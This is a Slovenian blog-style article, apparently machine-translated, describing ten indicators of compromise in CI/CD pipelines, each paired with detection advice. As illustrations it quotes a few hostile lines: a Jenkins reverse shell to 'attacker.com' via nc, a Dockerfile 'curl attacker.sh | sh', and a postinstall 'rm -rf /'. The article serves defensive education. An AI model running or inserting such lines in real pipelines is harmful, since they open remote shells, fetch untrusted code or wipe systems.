Uvod: Kaj so kazalniki ogrožanja kibernetske varnosti?
Kazalniki ogroženosti so prvi opozorilni znaki, da je vaš sistem oz. pipeline je lahko napaden. Preprosto povedano, kazalnike kompromisa so sledi, ki jih napadalci pustijo, kot čudne logins, spremembe datotek ali skrita zlonamerna programska oprema. V Kibernetska varnost MOK, delujejo kot prstni odtisi na kraju zločina in vam dajejo jasen dokaz, da je nekaj narobe. Zato, ko razvijalci vprašajo kaj so kazalniki kompromisa, odgovor ni omejen le na strežnike ali požarne zidove, temveč vključuje tudi tveganja, skrita v sodobnih CI/CD pipelines.
V teh pipelineNapadalci lahko spreminjajo kodo, vstavljajo zlonamerne odvisnosti ali spreminjajo korake gradnje, ne da bi jih to opazili. Vendar se večina priročnikov še vedno osredotoča le na strežnike ali omrežja. Posledično je dobavna veriga programske opreme postala ena najlažjih tarč.
Zato je iskanje kazalnikov kompromisa v CI/CD pipelines je bistvenega pomena. Predvsem pa pomaga ekipam blokirati zlonamerno programsko opremo, zaščititi skrivnosti in zavarovati vsak korak dobave programske opreme.
10 najpomembnejših kazalnikov kompromisa v CI/CD Pipelines
Pri razlagi kazalnikov ogrožanja se večina seznamov osredotoča na strežnike ali omrežja. Vendar pa v CI/CD pipelineNapadalci puščajo zelo različne prstne odtise. Prepoznavanje teh signalov je ključnega pomena za proaktivno obrambo. Spodaj je 10 opozorilnih znakov kibernetske varnosti IOC, na katere bi moral biti pozoren vsak razvijalec in varnostni inženir.
1. Sumljive spremembe odvisnosti
Eden glavnih kazalnikov kompromisa v pipelines je nenadna, nenavadna posodobitev odvisnosti. Napadalci pogosto izkoristijo zaupanje, ki ga razvijalci izkazujejo upravljalnikom paketov, da dodajo nevarne pakete.
Na primer, v npm a package.json razlika lahko nenadoma vključuje:
Takšne spremembe so morda videti varne, vendar lahko v vsako gradnjo vbrizgajo trojansko kodo.
Učinek: Ogrožene različice podedujejo zlonamerno programsko opremo pri viru.
Zaznavanje: uveljavljajte preglede odvisnosti, sledite razlikam v zaklepnih datotekah in nenehno skenirajte nove pakete.
2. Zakrita koda v gradnjah
Avtorji zlonamerne programske opreme se zanašajo na zakrivanje, da bi se izognili pregledom. Posledično je ta kazalnik ogroženosti v CI/CD pipelines je lahko eden najtežje zaznavnih. Pravzaprav se zakriti koristni tovori pogosto brez predhodnega obvestila znajdejo v odprtokodnih knjižnicah ali slikah vsebnikov.
Na primer:
- Paket PyPI, ki uporablja
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - Dockerjeva slika, polna nepotrebnih binarnih datotek UPX.
- JavaScript, poln
\x41\x42pobegne skritim kradljivcem poverilnic.
Učinek: Skrita koda se med gradnjo ali izvajanjem izvaja tiho, zaradi česar je to ključni signal v kibernetski varnosti IOC.
Zaznavanje: Združite SAST s skeniranjem zlonamerne programske opreme za označevanje kodirane ali zapakirane kode. Predvsem pa je treba zakrivanje obravnavati kot opozorilni znak, ki si zasluži nadaljnjo preiskavo.
3. Skrivnosti, razkrite v Gitu: klasično tveganje za kibernetsko varnost IOC
CI/CD pipelinepogosto podedujejo skrivnosti neposredno iz repozitorijev. Vendar pa ko se skrivnosti pojavijo v Gitu, postanejo eden najjasnejših odgovorov na vprašanje »kaj so kazalniki kompromisa v pipeline"Ko poverilnice pristanejo v Gitu, jih lahko napadalci izkoriščajo v nedogled.
Na primer:
- A
.envdatoteka, ki vsebujeAWS_SECRET_KEY=. - Žetoni so vstavljeni
config.json. - Skrivnosti so še vedno vidne v zgodovini Gita tudi po odstranitvi.
Učinek: Izpostavljeni ključi napadalcem omogočajo neposreden dostop do CI/CD pipelines, oblačnih sistemov ali podatkovnih baz. To je zato eden najnevarnejših kazalnikov vdora.
Zaznavanje: Uporaba pre-commit hooks in opravila CI za skrivno skeniranje ter takoj prekliče razkrite ključe. Poleg tega uveljavite avtomatizirano sanacijo za zmanjšanje časovnih oken izpostavljenosti.
4. Spremenjeno Pipeline Konfiguracije: Skriti kazalniki kompromitacije
Pipeline konfiguracije so cilji visoke vrednosti, ker ena sama sprememba pogosto uniči celoten potek delaPosledično spremenjeno pipeline Datoteke predstavljajo veliko tveganje za kibernetsko varnost IOC, ki ga tradicionalna orodja za spremljanje le redko zaznajo.
Na primer:
V dejanjih GitHuba:
- V GitLabu: dodano zlonamerno opravilo
.gitlab-ci.ymlki izbriše občutljive podatke. - V Jenkinsu:
sh "nc -e /bin/bash attacker.com 4444".
Učinek: Te neodobrene spremembe spremenijo vaše pipeline v trajna zadnja vrata za napadalce, kar očitno šteje kot pokazatelj kompromitacije.
Zaznavanje: Uveljavite podpisane konfiguracije, zahtevajte odobritve PR in spremljajte nepričakovana opravila. Poleg tega nastavite guardrails ki samodejno blokirajo spremenjene delovne procese.
5. Privilegiran IaC Neplačila
Napačno konfigurirane definicije infrastrukture pogosto ustvarijo skrita zadnja vrata. Posledično privilegirane privzete nastavitve v IaC so klasično kibernetsko tveganje MOK.
Na primer:
- Uvedba Kubernetes za dodeljevanje podov
privileged: true. - Helmovi grafikoni, ki razkrivajo storitve z
0.0.0.0:22.
Učinek: Napadalci pridobijo dostop do korenskih pravic ali javno razkrijejo notranje storitve. Posledično te težave znatno razširijo površino napada.
Zaznavanje: Uporabi IaC skeniranje za uveljavitev najmanjših privilegijev pred združitvijo. Poleg tega zagotovite, da je vsaka konfiguracija pregledana kot del pipeline.
6. Nenavadno vedenje pri gradnji
Napadalci pogosto spreminjajo pipeline vedenje, ki omogoča zlonamerna dejanja. Z drugimi besedami, nenavadna dejavnost gradnje je eden najjasnejših odgovorov na vprašanje, kaj so kazalniki ogrožanja v CI/CD pipelines.
Na primer:
- Gradnje, ki pošiljajo odhodne omrežne zahteve čudnim domenam.
- Projekt Node.js nenadoma sproži PowerShell med
npm install. - Naloga CI prenaša velike binarne datoteke, ki niso definirane v skriptih za gradnjo.
Učinek: Ogrožene različice lahko delujejo kot distribucijske točke zlonamerne programske opreme. Predvsem pa širijo zlonamerne koristne tovore po vsaki uvedbi.
Zaznavanje: Spremljajte dnevnike gradnje za nepričakovane procese ali povezave. Poleg tega konfigurirajte zaznavanje anomalij, da označite vedenja zunaj normale.
7. Zlonamerni paketni skripti kot tveganja za kibernetsko varnost MOK
Življenjski cikel podpore za upravljalnike paketov hooks ki jih napadalci izkoriščajo. Zato so zlonamerne skripte v npm, PyPI ali Dockerfiles močni kazalniki vdora.
Na primer:
- npm:
postinstallskript se izvajarm -rf /ali usmerjanje na C2. - PyPI:
setup.pyizvajanje skrite kode Python ob namestitvi. - Dockerfile:
RUN curl attacker.sh | sh.
Učinek: Napad se izvede med namestitvijo, pred kakršnim koli testiranjem med izvajanjem. Posledično razvijalci tega morda sploh ne opazijo, dokler ni prepozno.
Zaznavanje: Preglejte manifeste paketov za namestitvene skripte. Poleg tega omejite tvegane hooks in CI/CD delovna mesta za zmanjšanje izpostavljenosti.
8. Kazalniki zastrupitve registra zaradi kompromitacije
Napadalci zamenjajo ali spremenijo artefakte v registrih, ti dogodki pa so učbeniški primeri kazalnikov ogrožanja dobavne verige. pipelines.
Na primer:
- Oznaka slike Dockerja, tiho posodobljena s plastjo, okuženo s trojanskim konjem.
- Notranji paket je bil zamenjan z zastrupljeno različico.
- skvotiranje imenskega prostora npm, kot na primer
lodash-proxy.
Učinek: Vsaka gradnja, ki uporablja artefakt registra, postane ogrožena. Poleg tega se ogrožanje razširi tudi na nadaljnje storitve.
Zaznavanje: Uveljavite preverjanja podpisov in integritete pri vseh prevzemih registra. Poleg tega sledite izvoru artefaktov z SBOM validacija.
9. Nenavadna uporabniška dejavnost kot dokaz MOK
Ogroženi računi skoraj vedno pustijo za seboj nenavadne sledi. Zato je nenavadno vedenje razvijalcev močan pokazatelj kompromitacije.
Na primer:
- Commitpotisnjeno ob 3. uri zjutraj po lokalnem času.
- Odobritve odnosov z javnostmi s strani računovodij na dopustu.
- Pipelines sproži z nenavadno frekvenco.
Učinek: Napadalci zlorabljajo ukradene poverilnice za vnašanje zlonamernih sprememb. Navsezadnje nepooblaščeni commitse zlahka vključijo v običajne delovne procese.
Zaznavanje: Nadzor SCM dejavnosti za anomalije, uveljavljanje večfaktorske autentifikacije (MFA) in redno menjavanje žetonov. Poleg tega opozarjajte na sumljive commit ali vzorce odobravanja.
10. Neuspešna preverjanja integritete ali podpisov v kibernetski varnosti MOK
Pogosto, a prezrto kazalnik kompromisa je neuspešno preverjanje integritete ali podpisa. V kibernetski varnosti IOC ta preverjanja preverjajo pristnost kode ali artefaktov. Če jih preskočite, ostane pipelineje izpostavljen.
Primeri:
- Zgoščena vrednost SHA256 se ne ujema s pričakovano kontrolno vsoto.
- Manjkajoč ali neveljaven podpis GPG.
- An SBOM prikaz nepodpisanih artefaktov.
Učinek: Napake integritete pogosto pomenijo nedovoljeno spreminjanje registra, zastrupitev registra ali vbrizgavanje zlonamerne programske opreme.
Zaznavanje: Avtomatizirajte preverjanja podpisov, uveljavite preverjanje kontrolnih vsot in blokirajte nepodpisane komponente. Predvsem pa vsako neuspešno preverjanje obravnavajte kot jasen dokaz ogroženosti.
CI/CD Kazalniki kompromisa na prvi pogled
| Kazalnik kompromisa (MOK) | Vpliv na CI/CD Pipelines | Kako odkriti |
|---|---|---|
| Sumljive spremembe odvisnosti | Napadalci v upravljalnike paketov vbrizgajo zlonamerne knjižnice, kar vodi do ogroženih gradenj. | Spremljajte razlike v zaklenjenih datotekah, uveljavljajte preglede odvisnosti in neprekinjeno skenirajte odvisnosti. |
| Zakrita koda v gradnjah | Skriti koristni tovori se izvajajo med gradnjo ali izvajanjem brez zaznavanja. | Uporaba SAST in skeniranje zlonamerne programske opreme za označevanje vzorcev kode base64, hex ali pakirane kode. |
| Skrivnosti, razkrite v Gitu | Uhajanje žetonov ali ključev API-ja napadalcem omogoča neposreden dostop do kritičnih sistemov. | Zaženite skrivne preglede v Gitu hooks in samodejno prekliče razkrite poverilnice. |
| Spremenjeno Pipeline Konfiguracije | Spremenjeni delovni tokovi omogočajo izbruh podatkov ali njihovo ohranitev znotraj CI/CD. | Zahtevajte odobritve PR, uveljavljajte podpisane konfiguracije in spremljajte pipeline spremembe. |
| Privilegiran IaC Neplačila | Preveč permisivne vloge ali nezaščitene privzete nastavitve razkrivajo oblačna okolja. | Preglejte datoteke Terraform, Kubernetes in Helm za uveljavljanje najmanjših privilegijev. |
| Nenavadno vedenje pri gradnji | Pipelineuporabljajo se kot točke za distribucijo zlonamerne programske opreme ali za lateralno premikanje. | Analizirajte dnevnike gradnje za nepričakovane prenose, procese ali odhodne klice. |
| Zlonamerni skripti paketov | Skriti skripti pred/po namestitvi sprožijo koristne obremenitve pred testiranjem med izvajanjem. | Blokirajte tvegane skripte npm/PyPI in omejite izvajanje v CI/CD službe. |
| Zastrupitev registra | Trojanski artefakti nadomeščajo zaupanja vredne slike ali binarne datoteke v registrih. | Preverjajte kontrolne vsote, uveljavljajte preverjanje podpisov in proaktivno skenirajte registre. |
| Nenavadna uporabniška dejavnost | Ogroženi računi širijo zlonamerno programsko opremo commits ali sprožilec pipelines. | Izvrševanje večstranske finančne pomoči, spremljanje commitza anomalije in analizirati login vzorce. |
| Neuspešna preverjanja integritete ali podpisa | Označuje spremenjeno kodo, odvisnosti ali slike, ki vstopajo v pipeline. | Avtomatizirajte preverjanja integritete in blokirajte nepodpisane ali neujemajoče se komponente. |
Zakaj tradicionalna kibernetska varnost MOK zgreši CI/CD Tveganja
Večina organizacij že spremlja kazalnike ogrožanja strežnikov, računalnikov ali omrežij. Vendar pa ta klasični pristop k kibernetski varnosti IOC prezre CI/CD pipelines, ki so zdaj ena najbolj kritičnih napadalnih površin. Pravzaprav, pipelinekažejo edinstvene signale ogroženosti, ki jih tradicionalna orodja ne morejo zaznati.
Kazalniki kompromisa v tradicionalni varnosti
Pri konvencionalni kibernetski varnosti IOC se običajno osredotoča na:
- neobičajna loginali IP-naslovi, ki nakazujejo na ukradene poverilnice.
- Sumljive zgoščene vrednosti datotek ali spremembe registra, ki razkrivajo zlonamerno programsko opremo.
- Nepričakovan odhodni promet, ki kaže na uhajanje podatkov.
To so dobro znani kazalniki, ki se spremljajo tudi v Okvir MITER ATT & CK, ki prikazuje običajno vedenje in taktike nasprotnikov. To so uporabni signali. Vendar se nanašajo predvsem na operacijske sisteme ali poslovna omrežja. Posledično spregledajo subtilne posege, ki se zgodijo prej v dobavni verigi programske opreme.
Zakaj CI/CD Pipelineso drugačni
CI/CD pipelineso avtomatizirana okolja, kjer razvijalci commit koda, odvisnosti za prevzem in izdaje gradenj. Napadalci vedo, da se ena ogrožitev tukaj kaskadno širi po vsaki uvedbi. Kateri so torej kazalniki ogrožanja v CI/CD pipelineIzgledajo zelo različno:
- Zlonamerna odvisnost, tiho dodana v package.json ali requirements.txt.
- Ključi ali žetoni API-ja, izpostavljeni v Gitu commitdatoteke .s ali .env.
- Zakrita koda, vbrizgana v pakete npm ali PyPI.
- Datoteke Terraform ali Kubernetes z nezaščitenimi privzetimi vrednostmi, kot je privilegirano: true.
- Pipeline opravila, urejena za izkrcanje podatkov ali odpiranje zadnjih vrat.
Ti signali kompromisa v CI/CD ostati neviden za standard varnostna orodja.
Vrzel v kibernetski varnosti MOK
Čeprav se številne ekipe zavedajo vrednosti indikatorjev ogroženosti, se še vedno zanašajo le na zaznavanje s strežnikov in omrežnih dnevnikov. Zato lahko napadalci zastrupijo gradnje ali vstavijo zlonamerno programsko opremo, ne da bi pustili običajne sledi. Zato incidenti, kot so zadnja vrata XZ Utils ali zlonamerni paketi npm, niso bili odkriti, dokler niso dosegli produkcijske različice.
Te vrste kompromisov v dobavni verigi so poudarjene tudi z CISNavodila za varnost dobavne verige A, ki opozarja, da napadalci vse pogosteje ciljajo CI/CD pipelinein registri.
Takeaway
Tradicionalna kibernetska varnost IOC je potrebna, vendar ne zadostna. Predvsem pa morajo ekipe prepoznati kazalnike ogrožanja, specifične za CI/CD pipelineŠele takrat lahko zaznajo zlonamerno kodo oz. pipeline zlorabo, preden se razširi po okolju.





